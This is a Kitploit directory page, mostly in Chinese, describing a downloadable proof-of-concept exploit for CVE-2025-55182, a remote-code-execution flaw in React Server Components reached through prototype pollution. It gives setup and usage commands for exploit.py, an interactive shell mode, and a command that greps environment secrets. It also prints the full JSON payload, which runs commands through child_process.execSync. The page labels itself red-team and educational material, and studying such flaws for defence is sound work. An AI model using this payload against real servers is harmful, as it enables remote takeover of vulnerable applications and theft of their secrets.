Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
EXPLOIT-CVE-2025-55182 — Proof-of-concept exploit for CVE-2025-55182 (React2Shell), a critical RCE vulnerability in React Server Components via prototype pollution. Includes interactive and command-line exploitation modes. | Kitploit
工具/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队Payload 开发
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

Proof-of-concept exploit for CVE-2025-55182 (React2Shell), a critical RCE vulnerability in React Server Components via prototype pollution. Includes interactive and command-line exploitation modes.

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 概念验证

CVE-2025-55182 React

概述

针对 CVE-2025-55182 (React2Shell) 的实践演示——React Server Components 中的一个严重 RCE 漏洞。

漏洞详情

  • CVE 编号: CVE-2025-55182
  • 类型: 通过原型污染实现的远程代码执行
  • CVSS: 9.8 (严重)
  • 影响范围: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

攻击向量

React Server Components 不安全地反序列化 FormData。特制的多部分字段会触发原型污染,并通过 child_process.execSync 执行任意代码。


快速设置

root@kitploit:~
npm install
pip3 install requests
npm run dev

应用程序运行于:http://localhost:3000


利用

基本用法

root@kitploit:~
python3 exploit.py -c "whoami"

命令示例

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

交互模式

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
命令结果:
your-username
============================================================

> pwd
命令结果:
/path/to/project
============================================================

> exit

工作原理

载荷结构

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

测试

终端1:启动服务器

root@kitploit:~
npm run dev

终端2:运行漏洞利用

root@kitploit:~
python3 exploit.py -c "whoami"

详细模式

root@kitploit:~
python3 exploit.py -c "whoami" -v

显示完整的载荷结构和服务器响应


参考

  • CVE-2025-55182 - NVD
  • React Security
  • OWASP Deserialization

作者:Guaxinim | 网络安全研究

下载工具